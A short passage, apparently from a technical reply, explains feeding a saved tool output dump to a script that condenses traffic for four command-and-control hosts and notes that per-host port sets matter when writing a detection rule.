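Feed it the full dump (for example the saved tool output) on stdin or from a file and the four C2 hosts come out as a few lines each instead of several hundred; the per-host port set is the part that matters for a detection rule, since the same address is contacted on 443 and 8080.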
